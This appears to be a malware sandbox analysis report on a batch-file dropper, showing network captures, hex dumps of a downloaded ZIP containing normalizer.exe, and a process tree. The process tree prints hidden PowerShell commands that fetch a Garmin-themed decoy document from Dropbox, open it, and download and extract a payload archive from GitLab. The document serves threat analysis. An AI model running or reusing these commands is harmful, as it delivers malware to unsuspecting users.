                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                              X-Dropbox-Request-Id: 9a302e0797ab449db6a7edd8590685e8
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              2024-12-24 06:31:04 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                              Data Ascii: ...status=302-->


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              1192.168.2.449731172.65.251.784437928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC90OUTGET /awsr/ga/-/raw/main/FGA2112.zip HTTP/1.1
                                                                                                                                                                                                                              Host: gitlab.com
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC445INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 24 Dec 2024 06:31:10 GMT
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              Content-Length: 68976502
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              CF-Ray: 8f6e8c028dc59e1a-EWR
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                              Content-Disposition: attachment
                                                                                                                                                                                                                              ETag: "e64eadcfc8edc8518fa3cadd982dd9bf"
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                              Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC508INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 37 50 6c 35 32 63 44 56 58 36 25 32 42 55 4d 43 25 32 42 78 33 41 36 38 75 67 49 41 7a 7a 32 25 32 42 77 32 71 25 32 46 71 64 6b 71 77 30 4f 43 31 43 5a 52 67 4a 58 67 6c 54 69 75 72 79 5a 36 74 46 73 25 32 46 59 67 77 75 61 72 55 72 71 67 6b 62 30 6a 64 44 4b 33 70 6f 75 52 4d 62 6b 44 73 62 6f 64 48 6d 6f 73 58 6b 30 45 57 4f 4c 72 5a 25 32 46 68 4e 7a 36 47 35 74 4f 54 37 4b 41 25 32 42 4a 31 6b 6d 57 38 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Pl52cDVX6%2BUMC%2Bx3A68ugIAzz2%2Bw2q%2Fqdkqw0OC1CZRgJXglTiuryZ6tFs%2FYgwuarUrqgkb0jdDK3pouRMbkDsbodHmosXk0EWOLrZ%2FhNz6G5tOT7KA%2BJ1kmW8%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC1369INData Raw: 50 4b 03 04 0a 00 00 00 00 00 e7 2c 89 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 53 63 72 69 70 74 73 2f 50 4b 03 04 14 00 00 00 08 00 c8 3d 56 58 30 70 28 4b 74 cd 00 00 9c a7 01 00 16 00 00 00 53 63 72 69 70 74 73 2f 6e 6f 72 6d 61 6c 69 7a 65 72 2e 65 78 65 ec bd 09 60 93 55 d6 30 fc 64 6b d3 8d 27 05 02 65 93 00 05 0a 05 2c 14 b5 35 a0 09 4d e4 09 a4 52 36 a9 0a da d2 05 d0 42 3b ed 13 16 05 6c 4d 3b d3 f0 18 45 47 1d 67 c6 51 c6 65 c4 d1 99 71 d4 61 53 b1 a5 d0 05 0a 14 54 2c e0 52 c5 e5 89 01 2c 2e 6d d9 fa fc e7 dc 7b 93 a6 a5 a8 ef bc df fb 7d ff f7 7e 6f da e4 dc 7d bf e7 9e 73 ef 3d e7 a6 df b1 99 d3 70 1c a7 85 af a2 70 dc 0e 8e 7e 2c dc cf 7f 3a e0 db 67 f8 ae 3e dc 9b 11 07 47 ec 50 39 0f 8e 58 b0 7c 45 89 a9 a8 b8 70 59 71 f6 4a 53
                                                                                                                                                                                                                              Data Ascii: PK,YScripts/PK=VX0p(KtScripts/normalizer.exe`U0dk'e,5MR6B;lM;EGgQeqaST,R,.m{}~o}s=pp~,:g>GP9X|EpYqJS
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC1369INData Raw: 98 63 a0 ec c5 00 ad 3b 37 43 aa bb 22 c8 d4 be 1d ca b0 83 e4 e2 de 9b 80 69 59 e6 e3 d4 16 a4 e3 8a f1 1d 52 3e 71 94 bb 43 ed d2 b5 d5 68 5c 83 68 48 e9 80 4d aa 92 9a 70 b2 de 29 28 a3 c7 84 24 61 ba 13 d3 d8 c3 71 b4 fd 17 b1 b4 04 6f 8c ac 28 8a dc 6f 08 89 2e 48 1d f2 43 83 30 f1 b5 d1 52 bd 3c ce 84 ae cd 7e ad e0 3e 00 3d 75 58 3e 4d 86 7b 37 94 d0 28 48 80 ce 32 01 2b 2c 37 08 9e 22 40 0c 6b 4d 14 2d 60 16 72 5f 03 c6 a8 97 7f ad e0 5c ec 90 d5 68 f7 0a 49 b2 8b 38 34 cb e7 78 e2 90 25 e7 12 07 59 70 2b 8a d8 57 30 5f e4 cb 67 42 d9 05 73 07 5f 7e 13 1a dc 17 89 fb a7 7c f9 b5 c4 bd 99 2f 1f 43 dc 3b 88 7b 1d 5f 3e 90 b8 d7 f0 e5 7d c0 b0 b3 0d d2 53 8c f7 7d 03 c6 1f c1 e4 94 64 c5 58 80 b6 1f 88 ad 45 31 de f5 0d 96 ad 55 5e c5 d3 32 7e 03 13
                                                                                                                                                                                                                              Data Ascii: c;7C"iYR>qCh\hHMp)($aqo(o.HC0R<~>=uX>M{7(H2+,7"@kM-`r_\hI84x%Yp+W0_gBs_~|/C;{_>}S}dXE1U^2~
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC1369INData Raw: 13 21 35 89 d8 79 d6 29 cc 67 fa f3 e0 28 35 89 90 d6 75 4f 81 d1 1f 05 86 47 c1 20 b8 bf 81 66 f5 16 01 5f 99 6f f5 4c bd ad 56 b7 f6 7a 15 97 21 f7 83 56 03 94 e7 35 7e a3 09 25 08 4d df e3 b8 72 63 e2 82 d4 89 04 83 b9 b9 64 60 69 6a 8c c8 97 a6 46 8a 91 82 52 2d 98 eb 8b cf fa 35 30 0f 20 7e 05 62 c0 77 35 74 35 38 f5 9d a2 58 2a 6f 40 14 97 91 78 d1 29 d5 40 4d 76 fa 2e 23 a6 3a 0c 78 2d 81 a4 8a bc 8f 62 7c e1 73 a0 85 0f 11 56 e1 9f 58 80 9c 0e 4c e0 39 48 20 df 23 ae cf 10 80 ee cf c8 4f 85 ee 10 61 88 43 27 be 2f af 32 90 e6 88 c0 b1 92 9f 7a 83 4b 86 b1 35 8a d4 60 8b 86 f2 1a b9 10 db cf b3 d6 bb d9 10 e8 f0 3a e8 f0 70 d2 e1 10 63 04 89 f1 0c 8b 31 25 34 46 4c 2f 31 10 67 58 10 8f 01 32 b0 c8 9f 5e 64 6d f6 a4 86 8d f5 16 42 ff 9f 43 72 63 7d
                                                                                                                                                                                                                              Data Ascii: !5y)g(5uOG f_oLVz!V5~%Mrcd`ijFR-50 ~bw5t58X*o@x)@Mv.#:x-b|sVXL9H #OaC'/2zK5`:pc1%4FL/1gX2^dmBCrc}
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC1369INData Raw: 08 a3 b0 0f 22 9b 11 b3 c8 1a 18 e3 7f 45 ee 8c c7 2a 23 a6 92 bf 0f 1a 05 a9 d6 df 57 be e8 00 c7 4f 82 8e c9 55 74 bb 80 6c 27 06 f6 0c bc ba ec c1 2a ae 86 ce 09 49 f7 f8 9d 2a ee ad fe 94 36 0d df 81 1b dc 7e 9d b9 86 77 d6 08 39 f5 bb 90 88 f6 e8 7e 05 41 e4 84 74 1c d4 3a fb 6c b2 8a b8 e2 bd 19 30 be 0f 78 86 2d 40 cf 28 ea 99 c0 3c c3 77 0c 46 0c bb 9a 30 91 df 0f 02 47 4f 7f 95 e0 de 93 04 98 4b 2f 28 07 80 56 90 74 17 81 33 f0 7f 85 08 05 d6 26 08 63 f7 0a 1a 87 54 ef f4 1a ff 2c a8 80 61 af 12 aa 3b 74 ee cf 86 3b 24 ed 1e e1 de 86 4c a7 d4 5f e5 70 5f 50 80 2a 77 5f 00 26 3f 1d e6 71 58 9d 1a fa 43 71 28 55 98 ba 43 69 70 bd 93 5c 45 a7 14 59 a7 96 65 70 5c e9 f4 cc 64 e8 13 51 27 9f 4f 27 ad fd 20 32 5a d0 85 be 6c a0 1a ba 70 03 90 02 02 16
                                                                                                                                                                                                                              Data Ascii: "E*#WOUtl'*I*6~w9~At:l0x-@(<wF0GOK/(Vt3&cT,a;t;$L_p_P*w_&?qXCq(UCip\EYep\dQ'O' 2Zlp
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC1369INData Raw: b7 85 d0 ee 71 72 e7 d0 60 59 b7 6b 08 ed ee fb 94 2e f6 41 3e c8 e9 cd 8d cf 92 47 60 f9 db 66 c6 59 f8 8a 5f b3 6d 9b f1 2a da 63 e3 dd 1d 9d e2 68 21 a7 89 ac 1a e7 75 c0 f1 26 5a 55 9c fb f3 e1 c2 bd 47 33 1d 9a fe f5 b0 1c 46 8c 80 15 3a 16 0c dc 08 dc 5d 03 16 54 17 06 81 da 66 a4 3c e0 1a 8d a9 0c c6 54 8c 40 28 08 52 35 5b ad 71 a5 76 68 a2 ab da ac 29 a5 62 3f 79 5e 57 59 a3 b0 ac 87 14 98 b0 e3 b1 24 96 61 88 b9 d2 a5 46 c6 52 64 a2 e3 f3 8b bb 58 8a ef 87 31 96 e2 3b 44 61 c8 52 24 e0 3c 46 62 39 1f da 52 4f d6 d4 1d 78 b5 84 df 7e 22 df 5c ef 42 86 c9 be 03 51 26 d8 4a 0c b0 32 71 f1 c0 ee 6f 6f e0 b7 6b 05 ff 18 b2 01 e7 04 8c 66 41 72 35 c9 26 55 2b c6 39 47 71 ab 06 5a 4c c7 6f 07 0f 7e 7b 35 bf fd c0 a8 ea 00 51 4e da 9f 30 6e 9b 86 04 eb
                                                                                                                                                                                                                              Data Ascii: qr`Yk.A>G`fY_m*ch!u&ZUG3F:]Tf<T@(R5[qvh)b?y^WY$aFRdX1;DaR$<Fb9ROx~"\BQ&J2qookfAr5&U+9GqZLo~{5QN0n
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC1369INData Raw: a6 7a e7 44 c8 9f ce 80 35 9e da 07 c3 ba 91 6c d8 b5 85 c7 fd 75 1e 9a a2 bd 79 c8 d1 51 17 14 5b 72 f4 ce 48 cc fd 0d 2b 8c 7e 45 e4 67 4b d1 5f 41 d8 41 06 c5 58 ba 1f 86 7c 5d c8 1e 07 ee f5 23 e5 25 d0 21 4d fa 91 d4 f8 d6 94 de 6a 0c c9 18 0c b0 04 58 f6 73 5c d7 7e 0e f2 5a 71 41 5c 05 23 e2 90 62 93 be b2 27 9f f1 de 15 0d 23 3b cd 4a f7 4a 00 df 6c 43 7c 73 40 1e 84 b5 48 56 60 d6 7d 7d 83 8a 83 d8 f1 6e c5 c2 7b 25 15 f2 ac ed b3 a4 a1 ad 84 25 38 c7 d1 5c 92 70 5e 0a 3a 2e 8a 5e a5 70 37 80 7b 5b 9a 5e c5 57 bc 42 70 0a 34 c6 34 5a e5 2a 2b 36 0f 3a 8c 10 bc b3 03 8d f3 5d 03 29 40 94 cd bb 5c 65 83 01 9a e0 d7 28 69 ac 91 1e b6 00 09 5f 71 c6 95 8b e1 15 e3 dd 0d 34 69 31 9a da 17 81 dd 2f 60 8d 30 d0 cd b5 e0 25 78 92 01 61 4e 82 82 cf 4e 84
                                                                                                                                                                                                                              Data Ascii: zD5luyQ[rH+~EgK_AAX|]#%!MjXs\~ZqA\#b'#;JJlC|s@HV`}}n{%%8\p^:.^p7{[^WBp44Z*+6:])@\e(i_q4i1/`0%xaNN
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC1369INData Raw: 3a 35 3e 01 f6 15 1a 61 be 8a 8c 19 1d 24 e3 07 84 3c 1b 77 0c c4 48 59 7b 0a a7 71 4e 02 e7 ce 89 0b 12 29 b4 ab 7b a1 b1 21 72 c8 e4 e8 2f 0f ee 2a 07 de 55 00 3c 3d 06 ca 61 11 c3 dc d9 71 9c bf 55 be e5 6b 46 71 5f a7 04 28 ee 03 e0 e4 3f 16 42 71 37 86 f2 d0 39 e7 61 de bc 4f 2e 1b 75 28 e2 ed 82 a4 33 5f ab e2 76 62 9f bb 15 c0 14 96 f2 1d 78 fa e9 8a 34 9f 77 0d 6b b3 64 a9 c4 81 f2 8b 10 7c 27 bd dd da 2c 3f 85 71 cd 35 e2 35 90 ce 43 68 96 ea 15 63 5d 15 bd 91 a4 18 9f a8 22 1b d1 6a 18 99 87 e5 aa 1f 70 88 7d 4a af 99 e9 ac 48 00 7a 8d 07 26 e1 1c 8c de 9f 7e ef c9 cc 19 b5 b6 41 7a 0e 26 15 12 54 ab 22 29 ee 0a ce 8a 20 bf 10 87 4d c4 36 c2 90 ae 74 5f ec 04 8c 7c 4d 24 a5 4c db 22 02 94 29 b9 08 00 64 6e 9e 79 98 03 72 29 59 82 17 df a4 ef 91
                                                                                                                                                                                                                              Data Ascii: :5>a$<wHY{qN){!r/*U<=aqUkFq_(?Bq79aO.u(3_vbx4wkd|',?q55Chc]"jp}JHz&~Az&T") M6t_|M$L")dnyr)Y
                                                                                                                                                                                                                              2024-12-24 06:31:10 UTC1369INData Raw: 38 ab 5d ab dd 5f 77 ba bf ba e4 3e ac e6 77 9d 0d f7 17 41 42 ae a5 90 88 35 4a f1 e7 b8 7d 0b c4 39 6e 5f 1f 71 1a 64 39 1e f3 1e e8 3e 1f c6 57 0c 86 31 d2 5e c7 c1 d2 e9 ba 1e 72 e9 e3 4f b5 43 6f 27 da a5 7a 7e 57 5b 1f 7f 22 da 86 11 db d9 3e fe 61 2c 64 34 84 e4 fd 3c bf eb eb e8 12 9d 55 3a e6 d7 82 43 c8 f5 59 be 42 0b c9 da 71 c7 61 37 92 3b da ae 96 16 bc 31 fb de 02 fe 77 87 86 8c fd f7 e4 3f fe 8a ec 28 56 3c 4a 78 8e 9a b0 d0 c0 f9 6e f3 74 be 62 0d f5 09 26 60 7c 88 24 a0 a3 32 2f f2 5d 1f 21 93 4d 7a 33 12 8a d1 d7 7f 2b 04 59 47 82 e8 59 10 73 57 10 03 04 89 f5 27 e2 fd 48 12 24 9c 05 89 23 41 f8 8a 48 9a 59 1f 08 66 e8 56 14 5b 6a 32 5f 41 a5 b9 9c 78 d4 d9 08 2c 09 cc 54 bc 92 5f 8a db c5 cf 16 d1 7a 1c 87 20 8a ce 1a 05 13 1a d0 a1 c7
                                                                                                                                                                                                                              Data Ascii: 8]_w>wAB5J}9n_qd9>W1^rOCo'z~W[">a,d4<U:CYBqa7;1w?(V<Jxntb&`|$2/]!Mz3+YGYsW'H$#AHYfV[j2_Ax,T_z


                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:01:30:58
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" "
                                                                                                                                                                                                                              Imagebase:0x7ff64bdc0000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                              Start time:01:30:58
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                              Start time:01:30:58
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:chcp.com 437
                                                                                                                                                                                                                              Imagebase:0x7ff6e7fd0000
                                                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                              Start time:01:30:58
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:findstr /L /I set "C:\Users\user\Desktop\hnskdfgjgar22.bat"
                                                                                                                                                                                                                              Imagebase:0x7ff7d51a0000
                                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                              Start time:01:30:58
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:findstr /L /I goto "C:\Users\user\Desktop\hnskdfgjgar22.bat"
                                                                                                                                                                                                                              Imagebase:0x7ff7d51a0000
                                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                              Start time:01:30:58
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:findstr /L /I echo "C:\Users\user\Desktop\hnskdfgjgar22.bat"
                                                                                                                                                                                                                              Imagebase:0x7ff7d51a0000
                                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                              Start time:01:30:59
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:findstr /L /I pause "C:\Users\user\Desktop\hnskdfgjgar22.bat"
                                                                                                                                                                                                                              Imagebase:0x7ff7d51a0000
                                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                              Start time:01:30:59
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:find
                                                                                                                                                                                                                              Imagebase:0x7ff6116a0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                              Start time:01:30:59
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                              Imagebase:0x7ff64bdc0000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                              Start time:01:30:59
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:find
                                                                                                                                                                                                                              Imagebase:0x7ff6116a0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                              Start time:01:30:59
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                              Imagebase:0x7ff64bdc0000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                              Start time:01:30:59
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')"
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                              Start time:01:31:06
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx'"
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:01:31:07
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                              Start time:01:32:59
                                                                                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
